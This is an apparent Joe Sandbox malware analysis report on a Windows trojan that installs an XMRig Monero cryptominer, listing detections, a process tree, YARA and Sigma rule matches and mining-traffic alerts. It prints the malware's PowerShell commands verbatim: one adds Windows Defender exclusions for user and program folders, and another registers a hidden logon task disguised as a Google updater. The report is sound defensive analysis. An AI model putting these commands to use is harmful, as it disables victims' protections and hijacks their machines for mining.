Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
h2qWqtD73F.exe

Overview

General Information

Sample name:h2qWqtD73F.exe
renamed because original name is a hash value
Original sample name:d0c2dd0e059c5011ed2eee4c65122177.exe
Analysis ID:1528505
MD5:d0c2dd0e059c5011ed2eee4c65122177
SHA1:a992a12930f59a9bff9a49337c004fef02a9fa4e
SHA256:9db1d611bba928f40d86374641783083cda4f613236f3ec21ce62bcdeee9a6e6
Tags:64exetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Protects its processes via BreakOnTermination flag
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • h2qWqtD73F.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\h2qWqtD73F.exe" MD5: D0C2DD0E059C5011ED2EEE4C65122177)
    • dialer.exe (PID: 8108 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 2508 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 916 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 980 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 352 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 476 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 660 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 652 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1060 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • updater.exe (PID: 7012 cmdline: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe MD5: D0C2DD0E059C5011ED2EEE4C65122177)
          • dialer.exe (PID: 7816 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
            • svchost.exe (PID: 1332 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1364 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1452 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1504 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1624 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1660 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1668 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1836 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1864 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1972 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1980 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1992 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2044 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 2136 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
            • svchost.exe (PID: 2220 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1120 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1132 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1192 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1288 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 7880 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8124 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5320 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2744 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000010.00000002.2675524616.0000020422C06000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
      00000010.00000002.2676628688.0000020422C5F000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
        00000010.00000002.2654430567.0000020422302000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
          00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x5153a8:$a1: mining.set_target
            • 0x510b88:$a2: XMRIG_HOSTNAME
            • 0x512680:$a3: Usage: xmrig [OPTIONS]
            • 0x510b60:$a4: XMRIG_VERSION
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            20.2.updater.exe.7ff6dd49ea80.7.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              20.2.updater.exe.7ff6dd49ea80.7.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x511928:$a1: mining.set_target
              • 0x50d108:$a2: XMRIG_HOSTNAME
              • 0x50ec00:$a3: Usage: xmrig [OPTIONS]
              • 0x50d0e0:$a4: XMRIG_VERSION
              20.2.updater.exe.7ff6dd49ea80.7.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x517901:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
              20.2.updater.exe.7ff6dd49ea80.7.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x517e60:$s1: %s/%s (Windows NT %lu.%lu
              • 0x518688:$s3: \\.\WinRing0_
              • 0x510b88:$s4: pool_wallet
              • 0x50c990:$s5: cryptonight
              • 0x50c9a0:$s5: cryptonight
              • 0x50c9b0:$s5: cryptonight
              • 0x50c9c0:$s5: cryptonight
              • 0x50c9d8:$s5: cryptonight
              • 0x50c9e8:$s5: cryptonight
              • 0x50c9f8:$s5: cryptonight
              • 0x50ca10:$s5: cryptonight
              • 0x50ca20:$s5: cryptonight
              • 0x50ca38:$s5: cryptonight
              • 0x50ca50:$s5: cryptonight
              • 0x50ca60:$s5: cryptonight
              • 0x50ca70:$s5: cryptonight
              • 0x50ca80:$s5: cryptonight
              • 0x50ca98:$s5: cryptonight
              • 0x50cab0:$s5: cryptonight
              • 0x50cac0:$s5: cryptonight
              • 0x50cad0:$s5: cryptonight
              20.2.updater.exe.7ff6dd480000.4.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 11 entries

                System Summary

                barindex
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }, ProcessId: 8124, ProcessName: powershell.exe
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }, ProcessId: 8124, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7880, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7880, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 8108, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 916, ProcessName: svchost.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7880, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T00:24:58.988704+020020362892Crypto Currency Mining Activity Detected192.168.2.11635171.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T00:24:27.346115+020028269302Crypto Currency Mining Activity Detected192.168.2.1149871142.202.242.4380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: h2qWqtD73F.exeAvira: detected
                Source: C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmpAvira: detection malicious, Label: HEUR/AGEN.1362356
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeReversingLabs: Detection: 55%
                Source: h2qWqtD73F.exeReversingLabs: Detection: 55%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeJoe Sandbox ML: detected
                Source: h2qWqtD73F.exeJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: updater.exe PID: 7012, type: MEMORYSTR
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: losestratum+tcp://
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: cryptonight/0
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: losestratum+tcp://
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]

                Compliance

                barindex
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeUnpacked PE file: 20.2.updater.exe.28471390000.1.unpack
                Source: h2qWqtD73F.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: @C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: mbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831* source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct4AB9.tmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct8ACF.tmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
